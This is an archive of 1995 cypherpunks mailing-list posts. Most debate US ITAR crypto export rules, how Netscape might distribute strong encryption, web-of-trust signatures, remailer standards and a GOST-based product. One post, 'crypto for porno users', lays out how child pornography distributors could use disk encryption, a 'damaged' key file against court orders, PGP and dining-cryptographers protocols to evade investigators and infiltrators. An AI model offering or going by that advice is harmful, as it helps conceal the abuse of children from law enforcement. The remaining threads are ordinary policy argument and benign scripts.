Actually, that's not true.  What's REALLY important to the government is
that it not be AVAILABLE outside the country, or perhaps even more
accurately, not available anywhere.  Problem is, the government doesn't have
unlimited authority in this area.


>> >Or, to bring it down to a practical question, what's stopping Netscape?  How
>> >does Netscape setting up an 'export controlled' ftp site based on the MIT
>> >version lead to one of their executives going to jail?
>
>Maybe their executives don't want to deal with the possibility of going to
>jail and are staying far from the edge of the law.  Maybe they are too busy
>trying to find some way to make money.
>
>> I very much agree with the direction you appear to be headed in.  It seems
>> to me that Netscape should have no problem devising some sort of scenario in
>> which such a program eventually gets onto the nets, but in a way that is
>> squeaky clean, at least for THEM.  
>
>But why would they want to risk this? As squeeky clean as it is, we now
>all know that they know that making it available this way is exporting
>it. 

NO!  The government doesn't even pretend to have authority over non-exported
encryption, and they readily admit this.    And I'm sure they are also are
aware that they can't press their luck with an overbroad interpretation of ITAR.

Let's look at REALITY, okay?  Export controls on products have been around
for many decades.  Computers are a classic example.  If merely manufacturing
a product that (if exported to the wrong place) becomes a violation of such
laws/regulations, then practically every computer company that has ever
existed violated ITAR.

Here's the real "problem": Export regulations were intended to MINIMIZE the
number of controlled products "leaking through" the border.  There was never
any illusion that this could be entirely eliminated. So far so good: They
were happy to minimize the number of mainframe computers 1970 (for example)
USSR got.

Software, by its very nature, is infinitely copiable, which means that even
a single export  constitutes a complete failure of the system.  Thus, a
system of regulation that was useful for hardware becomes totally useless
for software.

 
>> In addition, why should they even need to write the encrytion part of their
>> software IN the US?  It occurs to me that one way to do this might be to
>> send one of their programmers to a conveniently-located place, such as
>> Vancouver BC , Montreal Canada, or a few other nearby places, with a great
>> deal of fanfare, and tell him to "write some crypto."  He does, and brings
>> it back into the US with him, leaving a copy of it "outside" the country for
>> international distribution.
>
>This is illegal as well. 

No, it isn't.

>The programmer is exporting the cryptosystem,

No, he isn't.  Exporting a book on encryption, including algorithms, for
example, is entirely LEGAL.  

And I think you're misusing the term, "cryptosystem."  The government may be
attempting to use ITAR to regulate exports of fully-functioning software,
but it apparently cannot touch books containing source code for such
programming.  Thus, "exporting the cryptosystem" is NOT always a violation
of ITAR if your definition of "cryptosystem" is so broad as to include
source-on-paper, and thus your statement is legally irrelevant.  If you
tighten up the term "cryptosystem" to  include only functioning software,
your statement becomes false because said programmer does not need to export
same.

Note that I'm assuming that the programmer GENUINELY writes the software
abroad, as opposed to faking it.   Of course, even "faking it" might be
legal:  If source-on-paper exporting is LEGAL, then taking a copy of an
encryption program outside the country on paper, then scanning it into a
computer and recompiling there should also be legal. 

>and may even be guilty of treason (probably not).  If you really want
>strong crypto, just buy it fom one of the hundreds of legitimate
>overseas suppliers.  If you want to export strong crypto Netscape,
>rewrite Netscape outside the US.  It's not that complex a program.

That's not a satisfactory solution.  The goal, I suggest, is to allow
Netscape (or any other manufacturer) to sell a SINGLE product around the
world, without violating (even arguably) ITAR.  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Fri, 24 Nov 1995 11:00:41 +0800
To: jimbell@pacifier.com (jim bell)
Subject: Re: Spam the Sign!
In-Reply-To: <m0tInGT-0008xjC@pacifier.com>
Message-ID: <9511240239.AA15636@all.net>
MIME-Version: 1.0
Content-Type: text


>  Jeff Simmons <jsimmons@goblin.punk.net> said...
> 
> >Then suppose you hand software to MIT to put on its export-controlled ftp
> >site (which would seem to follow your requirements to take reasonable
> >precautions to observe the ITAR, etc.) and you don't do the nudge, nudge,
> >wink, wink - BUT you know that it's going to be available on major ftp
> >sites in Europe within a few hours anyway.  The intent to export isn't 
> >there, but the export occurs anyway.  Is it the intent, or the knowledge
> >that's important?

What's important to the government is that the crypto not be exported.  If
Netscape did this, the government might try to take them to court to make
an example of them, or might leave them alone to support the information
superhighway, or might refuse to ever buy any Netscape, or whatever.  The
point for Netscape is than none of these are good for the corporation.

> >Or, to bring it down to a practical question, what's stopping Netscape?  How
> >does Netscape setting up an 'export controlled' ftp site based on the MIT
> >version lead to one of their executives going to jail?

Maybe their executives don't want to deal with the possibility of going to
jail and are staying far from the edge of the law.  Maybe they are too busy
trying to find some way to make money.

> I very much agree with the direction you appear to be headed in.  It seems
> to me that Netscape should have no problem devising some sort of scenario in
> which such a program eventually gets onto the nets, but in a way that is
> squeaky clean, at least for THEM.  

But why would they want to risk this? As squeeky clean as it is, we now
all know that they know that making it available this way is exporting
it.  It's also possible that one of the people who took part in it would
turn State's evidence, or that this would result in a loss of
shareholder confidence, or that the people running Netscape support the
government position, or even that they just don't want the controversey.

> In addition, why should they even need to write the encrytion part of their
> software IN the US?  It occurs to me that one way to do this might be to
> send one of their programmers to a conveniently-located place, such as
> Vancouver BC , Montreal Canada, or a few other nearby places, with a great
> deal of fanfare, and tell him to "write some crypto."  He does, and brings
> it back into the US with him, leaving a copy of it "outside" the country for
> international distribution.

This is illegal as well.  The programmer is exporting the cryptosystem,
and may even be guilty of treason (probably not).  If you really want
strong crypto, just buy it fom one of the hundreds of legitimate
overseas suppliers.  If you want to export strong crypto Netscape,
rewrite Netscape outside the US.  It's not that complex a program.

-- 
-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@omni.voicenet.com>
Date: Fri, 24 Nov 1995 12:26:07 +0800
To: cypherpunks@toad.com
Subject: Re: Export control FTP servers
In-Reply-To: <9511232220.AA19031@hplyot.obspm.fr>
Message-ID: <Pine.LNX.3.91.951123230420.466B-100000@localhost>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 23 Nov 1995, Laurent Demailly wrote:

> sameer@c2.org writes:
> [ 'passwd'/'secret' is NEWDIRNAME : ]
>  > NEWDIRNAME=`/usr/local/bin/pseudo-random | /usr/local/bin/md5sum`
> [...]
> Hey hey, cool, what a great security ! now can you please send source
> for /usr/local/bin/pseudo-random ? :-)))
> 
I just used the following simple shell script.  Not very secure but does
the trick for the purposes of export controlled directories.

#!/bin/sh
(date; uptime; ps -e; netstat; set) | md5sum
 
- --

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by mkpgp, a Pine/PGP interface.

iQCVAwUBMLVFB7Zc+sv5siulAQFH8gQAia001FgQfLTK7B97vB7KMH/eAb2RWG/a
MjO3x8Mp1FkHnyI5/hKvvxP2MEn8O69XPMIqKqn/dcflok807qJ9mnNh0MciHTMm
H5qStR3S36zFQyxLjrOcLN/9EzudsRIWndIX+/FFyBV7cNCSfUqHTYJGuqVzXbvC
IheIJzuxCu4=
=tXU6
-----END PGP SIGNATURE-----


`finger -l markm@omni.voicenet.com` for public key and Geek Code
Public Key/1024: 0xF9B22BA5 BD 24 D0 8E 3C BB 53 47  20 54 FA 56 00 22 58 D5
Homepage URL:http://www.voicenet.com/~markm/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Fri, 24 Nov 1995 06:34:21 +0800
To: Corey Bridges <corey@netscape.com>
Subject: Re: Spam the Sign!
In-Reply-To: <199511202259.OAA11521@netscape.com>
Message-ID: <9511232218.AA19027@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


Corey Bridges writes:
 > And yes, we HAVE enjoyed the message "Strong Crypto NOW" that's been
 > scrolling for the last 3 hours.
Where the spam was coming from ?

Btw, the web,... application is *great* it is always nice to (appear)
to interact with the real world ! ('cept that when I tried, the only
thing the camera showed was indeed "Strong Crypto" or "Now", it
would'nt let pass one of my messages)
It is a very easy target for abuses though...
Very nice job, keep up !

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

bomb domestic disruption Soviet Kennedy Peking Uzi plutonium




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Fri, 24 Nov 1995 06:52:24 +0800
To: sameer <sameer@c2.org>
Subject: Re: Export control FTP servers
In-Reply-To: <Pine.BSD.3.91.951121085819.4906B-100000@usr3.primenet.com>
Message-ID: <9511232220.AA19031@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


sameer@c2.org writes:
[ 'passwd'/'secret' is NEWDIRNAME : ]
 > NEWDIRNAME=`/usr/local/bin/pseudo-random | /usr/local/bin/md5sum`
[...]
Hey hey, cool, what a great security ! now can you please send source
for /usr/local/bin/pseudo-random ? :-)))

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

PGP Clinton ammunition Greenpeace Croatian Kennedy genetic




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Fri, 24 Nov 1995 18:18:54 +0800
To: cypherpunks@toad.com
Subject: Re: Junk E-Mail - Part 4
Message-ID: <Pine.BSD.3.91.951123231858.12363F-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
Friend, 
 
 
In its NEWS IN BRIEF summary, 11 22 95 Financial Times 
reports: 
 
   BRUSSELS/LONDON - SELLING - A ban on telephone "cold 
   calling" throughout the European Union was on Tuesday 
   approved by Euro-MPs, to the consternation of direct mar- 
   keting and distance selling organisations.  In a move de- 
   signed to spare people from what MEPs consider to be ir- 
   ritating telephone calls, a key parliamentary committee 
   voted to make prior consent from consumers obligatory 
   before a seller can approach them by telephone. 
 
   The proposed ban also applies to communications by e- 
   mail, raising fears among publishing organisations that 
   the development of the information society in Europe could 
   be damaged. 
 
 
Ban fear, for we have nothing to fear but fear itself. 
 
 
Cordially, 
 
Jim 
 
  
 
NOTE.  The URL of one Financial Times Group website is: 
 
                   http://www.usa.ft.com 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Fri, 24 Nov 1995 23:58:32 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Spam the Sign!
In-Reply-To: <m0tInGT-0008xjC@pacifier.com>
Message-ID: <Pine.3.89.9511232304.A31942-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 23 Nov 1995, jim bell wrote:

> deal of fanfare, and tell him to "write some crypto."  He does, and brings
> it back into the US with him, leaving a copy of it "outside" the country for
> international distribution.
As long as the programmer's not American. They could contract it to a 
Canadian though. We don't have freeware export restrictions on non-US 
crypto, but I'm none too clear about everything else. All the same why not
contract it to Eric Young or whoever it is who's doing an independent
version of SSL (or whatever it's called) Down Under (was it Australia or 
NZ?) ? I don't see why geography's a problem.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@clark.net>
Date: Fri, 24 Nov 1995 13:28:39 +0800
To: ecarp@netcom.com
Subject: establishing trust
Message-ID: <199511240500.AAA07836@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


>From khijol!erc@uunet.uu.net Thu Nov 23 16:21 EST 1995
>From: "Ed Carp [khijol SysAdmin]" <khijol!erc@uunet.uu.net>

..so..why the UUCP style address?

>Subject: Re: crypto for porno users
>To: khijol!clark.net!cme@uunet.uu.net (Carl Ellison)
>Date: Thu, 23 Nov 1995 15:57:17 -0600 (CST)
>Cc: khijol!got.net!edge@uunet.uu.net, khijol!toad.com!cypherpunks@uunet.uu.net
>

>totally different from this "web of trust" I keep hearing about - and that is
>*it*.  Do you trust me any more now than before I started signing my postings?

Actually, in my view, signed postings are the first step.  With those (and
the right S/W (not there yet)), I get to know that a bunch of postings came
from the same person.  I even know who they came from:  the person who
is capable of signing with key 0xXXXXXXXX.

Since the only way I have of getting to know the person is through those
postings, I get to know that person and through that knowledge I decide
whether or not to trust.

And, yes, I can be fooled.

 - Carl


 +--------------------------------------------------------------------------+
 |Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme            |
 |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
 |  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
 +---------------------------------------------- Jean Ellison (aka Mother) -+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <khijol!erc@uunet.uu.net>
Date: Sat, 25 Nov 1995 00:02:42 +0800
To: cme@clark.net (Carl Ellison)
Subject: Re: establishing trust
In-Reply-To: <199511240500.AAA07836@clark.net>
Message-ID: <199511240708.BAA22051@khijol>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

> >From khijol!erc@uunet.uu.net Thu Nov 23 16:21 EST 1995
> >From: "Ed Carp [khijol SysAdmin]" <khijol!erc@uunet.uu.net>
> 
> ..so..why the UUCP style address?

Because I don't have a real UUCP connection at the moment.  Khijol is 
expected to get back on the net as khijol.org in the next few days.  Just 
trying to get by until then :)

> >Subject: Re: crypto for porno users
> >To: khijol!clark.net!cme@uunet.uu.net (Carl Ellison)
> >Date: Thu, 23 Nov 1995 15:57:17 -0600 (CST)
> >Cc: khijol!got.net!edge@uunet.uu.net, khijol!toad.com!cypherpunks@uunet.uu.net
> >
> 
> >totally different from this "web of trust" I keep hearing about - and that is
> >*it*.  Do you trust me any more now than before I started signing my postings?
> 
> Actually, in my view, signed postings are the first step.  With those (and
> the right S/W (not there yet)), I get to know that a bunch of postings came
> from the same person.  I even know who they came from:  the person who
> is capable of signing with key 0xXXXXXXXX.

Yes, but that only establishes that I was the one who wrote the post, not 
that I am to be trusted...

> Since the only way I have of getting to know the person is through those
> postings, I get to know that person and through that knowledge I decide
> whether or not to trust.
> 
> And, yes, I can be fooled.

I've met a fair number of people in person that I've met over the net, and
I'm here to tell you that a lot of people I've met are totally different
in person than they are over the net.  People that I thought I could trust
gave me the willies in person, and I eventually found out that I couldn't
trust them at all.  Get burned a couple of times like that, and you learn
to suspend trust until you really meet someone in person. 

Just my $0.02.
- --
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935	voicemail/pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLVvXCS9AwzY9LDxAQFO+wP+KYeRi9K/9AgXA7iyha61lsjZpYkDoSD1
kGaH04GGKcBhxPbVeRDnKaqM8oxesi24aKBWC7Hc0mJhB1+fsjZpwghd5/CzYAiK
WcZULWnVLKIqXWJlQuV/1UsEgHVa0mCEFbIUVoJtILQXoSRGIO7ga+6poYy5ag/r
g4Kgbf4M8GM=
=+Ee3
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Fri, 24 Nov 1995 15:42:49 +0800
To: nyms@sephiroth.org (Nym Servers Mailing List)
Subject: Re: bit quiet in here lately
Message-ID: <199511240728.BAA11266@arnet.arn.net>
MIME-Version: 1.0
Content-Type: text/plain


At 02:11 AM 11/24/95 -0500, futplex wrote:
>sameer writes:
>> 	I am working on a spec which myself and others will turn into
>> an internet draft, for placements on the standards track.  It will
>> standardize remailer commands and nymserver commands, and will
>> incorporate payment. Once we get a draft written up it will be posted
>> for review, flames, and criticism.
>
>Great -- I've been toying with working on exactly that since the summer. 
>I never quite convinced myself that a) the general net community would really 
>take a remailer-related i-draft or RFC seriously, or even that b) the
>remailer community would really find a standards document useful. It's
>encouraging to see that some other people also think it's worth writing.
>

Now, if the remailer service-listing operators could agree on a standard
format for their reporting (lag time, feature lists, etc), then it would
simplify maintaining a list of remailers - which would increase the
usability of the remailer system, and help the use and growth of remailers.

Dave Merriman
This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th
of the PGP executable. See below for getting YOUR chunk! 
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8@X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geopages.com/CapitolHill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Fri, 24 Nov 1995 11:16:11 +0800
To: cypherpunks@toad.com
Subject: Re: The Mesh and the Net
In-Reply-To: <199511230141.UAA02365@pipe4.nyc.pipeline.com>
Message-ID: <Pine.HPP.3.91.951124032121.19699A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 22 Nov 1995, John Young wrote:

> "The Mesh and the Net: Speculations on Armed Conflict in a
> Time of Free Silicon," by Martin C. Libicki, March, 1994. 
> (233kb)
> 
> Available on the Web at:
> 
> <http://www.ndu.edu/ndu/inss/macnair/mcnair28/m028cont.html>
> 
> NDU is the National Defense University, Libicki's teat.

A very interesting read! The speculations about the future of the
(civilian) Net are amazing, even more so coming from an official
sub-division of the US DoD (?). An excerpt (that could have been
written by a cypherpunk crypto-anarchist philosopher just as well):

   'The information revolution, acting through
 multinational corporations and transnational
 communities, may weaken many powers of the state
 anyway.  Would it be much of an exaggeration to posit
 a nation's expression, not through government, but as
 a local ganglion of the world Net.  That being the
 case, might not the decline of the state coincide with
 the rise of the Net, the newest venue for crime,
 conflict, and chaos?'

Mats




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Fri, 24 Nov 1995 11:30:11 +0800
To: cypherpunks@toad.com
Subject: GOST for sale
Message-ID: <Pine.HPP.3.91.951124033807.19699B-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain



According to a short article in a Swedish newspaper (DN)
with the title 'Spy Code of KGB can make computers safe', 
JETICO INC., located in Finland (Tammerfors), introduced
a new crypto system on the world market last week. It's 
based on GOST, the Russian federal standard algorithm.
This product, called BestCrypt, is implemented at least
partly in hardware. Alledgedly it uses 'GOST 28147-89',
whatever that stands for.

GOST is probably very secure - a huge keyspace (256 bits) and
KGB would not have left a trapdoor for NSA to take advantage
of, would they?

The newspaper article ends:

'The Finnish entrepreneurs asseverate that their
Russian colleagues have never had anything to do
with the KGB.'

Mats







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gjeffers@socketis.net (Gary Jeffers)
Date: Fri, 24 Nov 1995 18:18:25 +0800
To: cypherpunks@toad.com
Subject: crypto for porno users
Message-ID: <199511241535.JAA30731@mail.socketis.net>
MIME-Version: 1.0
Content-Type: text/plain


                   crypto for porno users

   Crypto porno is a wonderful topic for Cypherpunks. Child porno people
are a group that definitely needs the very best in computer security. If
their computer security problems are solved, then everybodys' computer
security problems are solved.

               COMPUTER SITE DISK SECURITY

   The SecureDrive 1.4 disk encryptor system solves their computer site
disk storage problem. It also gives them the solution to the "rubber hose"
problem. With a "damaged" key file and the use of a password, they have
an effective defense against court orders demanding keys. (see the docs
for SecureDrive 1.4). Also disk encryptors not only encrypt files but also
solve the problem of temporary work files that are used by many software
packages (They can be reconstructed).

                TELECOMMUNICATIONS SECURITY

   MIT's PGP 2.6.2 solves their problem of secure telecommunications.
This assumes that the people involved can really trust each other.


                 STATE INFILTRATOR PROBLEM

   Of course, one of the really big problems for non-STATE approved
groups is the problem of state agents infiltrating the group. This gets
worse as the group gets bigger. This is also one more thing I have against
states - one of their jobs is having their agents make friends with cit-
izens and then betray their friends. Has anyone else noticed? -  THE STATE
HAS NO HONOR! The state prides itself on its cleverness here.

   Also, of course, once the state has entrapped an individual, they tend
to get other members of the group by having their victims get and give
evidence against other members. - sort of a domino effect and the group
unravels - especially with the conspiracy laws. Drug distribution gangs
are famous for falling to these techniques.

   A possibly unbreakable defense against the above assault would be the
use of a Dining Cryptographers protocol. According to Applied Crypto-
graphy, PGP may be used to send messages in these protocols. Pretend that
a small group of Cypherpunks are child porn enthusiasts and decide to use
the Cypherpunk mailing list to exchange pictures and child porn info..

   I know little of the theory of Dining Cryptographers but I would think
that a good implementation of it would make infiltrators useless. I will
leave it for other Cypherpunks to discuss the mechanics (specific and
general) for actually doing this.

   A possible risk would be that this would put the general membership of
Cypherpunks at risk - or would it just put the list itself to risk? Does
this imply that we need FORTRESS mailing lists or what others would des-
cribe as COERCION-FREE mailing lists? Would remailers that allow two way
secure communication be a help here? Would they be forced to be FORTRESS
or COERCION-FREE to be effective?  Should they use expendable lists?:-)

   Generally, if you wanted to start a discussion group on a forbidden
topic on the Internet, and wanted to keep it secure - how would you do
it? Today this is an academic question - but tomorrow? :-) Aside from
workable anonymous Internet money, the two most needed computer privacy
technologies are fortress mailing lists and remailers and workable Dining
Cryptographers protocols.


THE UNITED STATES "FEDERAL" GOVERNMENT HAS NO LEGITIMACY.
The United States "Federal" Government - We'll be even more American
without it.

                                           PUSH EM BACK! PUSH EM BACK!
                                           WWWAAAYYYY  BBBAAACCCCK!
                                           BBBEEEAAATTTT  STATE!

                                           Gary Jeffers






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gjeffers@socketis.net (Gary Jeffers)
Date: Sat, 25 Nov 1995 06:49:25 +0800
To: cypherpunks@toad.com
Subject: RE: establishing trust
Message-ID: <199511241600.KAA30794@mail.socketis.net>
MIME-Version: 1.0
Content-Type: text/plain


            RE: establishing trust

   Question: What's a WEB OF TRUST with STATE agents in it?
   Answer: - a DRIFTNET!  U heard it here first. :-)

THE UNITED STATES "FEDERAL" GOVERNMENT HAS NO LEGITIMACY.
The United States "Federal" Government - We'll be even more American
without it.

                                           PUSH EM BACK! PUSH EM BACK!
                                           WWWAAAYYYY  BBBAAACCCCK!
                                           BBBEEEAAATTTT  STATE!

                                           Gary Jeffers






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Fri, 24 Nov 1995 23:59:44 +0800
To: sameer <sameer@c2.org>
Subject: "lack" of export control rules
In-Reply-To: <199511240523.VAA03642@infinity.c2.org>
Message-ID: <Pine.BSD.3.91.951124054104.12402A-100000@usr4.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 23 Nov 1995, sameer wrote:

 a> The feds have never established a general policy.
 a> 

    in other words, business as usual with the Feds. If there is no "book"
on what is or is not legal v/v ITAR, and the agency responsible will not
communicate, it empirically says:  "...well, be reasonable to meet the
intent of the law, but we will not tell you what is really expected;
however, if, in the futute, we decide what we really want, we will bust
you if you did not fully comply despite your good intentions --and, if
that does not fly, we'll charge you with conspiracy...." 

    having been down the road a couple times including being charged with 
technology export for things which are essentially combinations of common 
knowledge, if nothing else works for the Feds, conspiracy will --and it 
carries the same penalties as the "crime" itself.  No small wonder the 
Europeans, including the British, laugh at our "legal" system.

 a> > if a solid (or reasonably accurate given the feds refusal
 a> > to put anything in writing) FAQ can be assembled, it would be worth
 a> > posting as a resource.
 a> >
 a> >     I had thought the feds were requiring that you at least verify the
 a> > address of the party requesting the code --at least as far as screening
 a> > out the obvious ones like .uk or .de and the like --which is far from
 a> > foolproof.  There has been mention someplace that they also expect some
 a> > screening by verifying numbers, not just names.
 a> >
 a> >     I guess the real question, just how much checking do they expect?
 a> > checking for country domains is easy enough, and the 'foolers' in 
 a> > .edu group can be listed, but there are plenty of other deceptions 
 a> > if you control the machine since communication inevitably works by 
 a> > the numbers which is a whole new ball of wax.
 a> >
 a> > On Tue, 21 Nov 1995, sameer wrote:
 a> >
 a> > > #!/bin/sh 
 a> > > umask 022
 a> > > DIRNAME=`cat $HOME/.usonlydir`
 a> > > NEWDIRNAME=`/usr/local/bin/pseudo-random | /usr/local/bin/md5sum`
 a> > > cd /u1/ftp/pub/US-only
 a> > > mv I_will_not_export_$DIRNAME I_will_not_export_$NEWDIRNAME
 a> > > cd ..
 a> > > sed -e "s/$DIRNAME/$NEWDIRNAME/" < README.US-only > README.new
 a> > > mv README.new README.US-only
 a> > > echo $NEWDIRNAME > $HOME/.usonlydir
 a> >





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Fri, 24 Nov 1995 23:59:56 +0800
To: jim bell <jimbell@pacifier.com>
Subject: real life problems with ITAR (was Spam the Sign!)
In-Reply-To: <m0tInGT-0008xjC@pacifier.com>
Message-ID: <Pine.BSD.3.91.951124073019.12402G-100000@usr4.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 23 Nov 1995, jim bell wrote:

>  Jeff Simmons <jsimmons@goblin.punk.net> said...
>
	[SNIP] 

> >
> >I have the feeling that we're talking about two different things here - the
> >law as it's practiced in the courtroom and the law as it's practiced on the
> >'streets'.  Obviously, the fact that I feel I'm doing something 'legal'
> >won't help much if the government decides to do a Phil Zimmerman on me.
> >But I would be interested in your comments.
> 
   On Thu, 23 Nov 1995, jim bell wrote: 
 
> I very much agree with the direction you appear to be headed in.  It seems
> to me that Netscape should have no problem devising some sort of scenario in
> which such a program eventually gets onto the nets, but in a way that is
> squeaky clean, at least for THEM.  
> 
> 
> In addition, why should they even need to write the encrytion part of their
> software IN the US?  It occurs to me that one way to do this might be to
> send one of their programmers to a conveniently-located place, such as
> Vancouver BC , Montreal Canada, or a few other nearby places, with a great
> deal of fanfare, and tell him to "write some crypto."  He does, and brings
> it back into the US with him, leaving a copy of it "outside" the country for
> international distribution.
> 
    <attila sez>  I think they have that one covered --not only is it 
violation of ITAR's intent to send a programmer out of the U.S., but is 
illegal to hire a foreign national to program for your non-U.S. products.
    the test is going to be with someone like Sun who "bought" a group of 
Russian crypto programmers and left them in Russia.  Now, the problem 
with ITAR is that if you import that code, you can not then export the 
code since it is now covered by ITAR.
    secondly, it appears there is a move afoot to make it an ITAR 
violation to hire the foreign nationals to circumvent ITAR --basically, 
the Feds want to stop cryptography _everywhere_, including telling 
Russians they can not work for U.S. companies!  Just where do they think 
they are getting off?

    then, when ALL hitech moves out of the U.S. and the DoD needs us, we 
will not be here, will we?  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@atlas.ex.ac.uk
Date: Fri, 24 Nov 1995 18:02:04 +0800
To: cypherpunks@toad.com
Subject: Re: real life problems with ITAR (was Spam the Sign!)
Message-ID: <604.9511240945@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Attila <attila@primenet.com> writes:
>    On Thu, 23 Nov 1995, jim bell wrote: 
>  
> > [US companies hiring non-US programmers to avoid ITAR]
> 
>     <attila sez>  I think they have that one covered --not only is it 
> violation of ITAR's intent to send a programmer out of the U.S., but is 
> illegal to hire a foreign national to program for your non-U.S. products.

Having your company legally based outside the US, with just a US
office (on paper) would seem to get around this.  If all your code is
shipped from Sun Corp, Russia (and actually you get CDs in the mail
from Russia literally if you order software from them), then it would
seem to avoid the problem.  They'd probably have to make sure that no
programming at all occured in the US otherwise they'd be susceptible
to the claim that they were violating ITAR by their US development
team exporting software with a hole for crypto to their main
development team in Russia.

Multinationals could juggle that much easily.

The other problem is that multi-nationals don't like stepping on the
govts toes, because the govt might retaliate by not buying Sun, or Sun
mysteriously losing contracts.  Sound right?

>     the test is going to be with someone like Sun who "bought" a group of 
> Russian crypto programmers and left them in Russia.  Now, the problem 
> with ITAR is that if you import that code, you can not then export the 
> code since it is now covered by ITAR.

However this is the real problem, the don't want crypto no matter
what.  They'll do their damnest to stop it by whatever means: legal or
illegal, monetary pressure, threats, FUD, overbroad ITAR, selective
enforcement, etc.

>     secondly, it appears there is a move afoot to make it an ITAR 
> violation to hire the foreign nationals to circumvent ITAR --basically, 
> the Feds want to stop cryptography _everywhere_, including telling 
> Russians they can not work for U.S. companies!  Just where do they think 
> they are getting off?
> 
>     then, when ALL hitech moves out of the U.S. and the DoD needs us, we 
> will not be here, will we?

Something that is puzzling me is how DigiCash is doing.  Their
software I think is ITAR regulated (or would be if it were shipped
from a US ftp site).  OK, so they get around it by shipping their
software from Digicash, Bv, Netherlands.

But, somewhere on their pages it mentions that: "Digicash, Bv is a
wholly owned subsidiary of Digicash" (which *is* based in the US).

Does that make them a counter example who is currently getting away
with it?  Just to complicate things further David Chaum is a US
citizen, right?  Maybe he himself is ok because he doesn't write the
code himself, the digicash development team does.  Is Digicash (US)
hiring (collectively) Digicash, Bv if it is a wholly owned subsidiary,
in US legal terms?

Reckon the long term message is for companies to just pull out of the
US.  Moving to a suitable jurisdiction would be possible for Netscape,
and would be a coool blow against ITAR.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimbell@pacifier.com (jim bell)
Date: Sat, 25 Nov 1995 01:41:00 +0800
To: attila <attila@primenet.com>
Subject: Re: real life problems with ITAR (was Spam the Sign!)
Message-ID: <m0tJ1o2-0008zJC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain



Attila@primenet.com said:

>   On Thu, 23 Nov 1995, jim bell wrote: 
> 
>> I very much agree with the direction you appear to be headed in.  It seems
>> to me that Netscape should have no problem devising some sort of scenario in
>> which such a program eventually gets onto the nets, but in a way that is
>> squeaky clean, at least for THEM.  
>> 
>> 
>> In addition, why should they even need to write the encrytion part of their
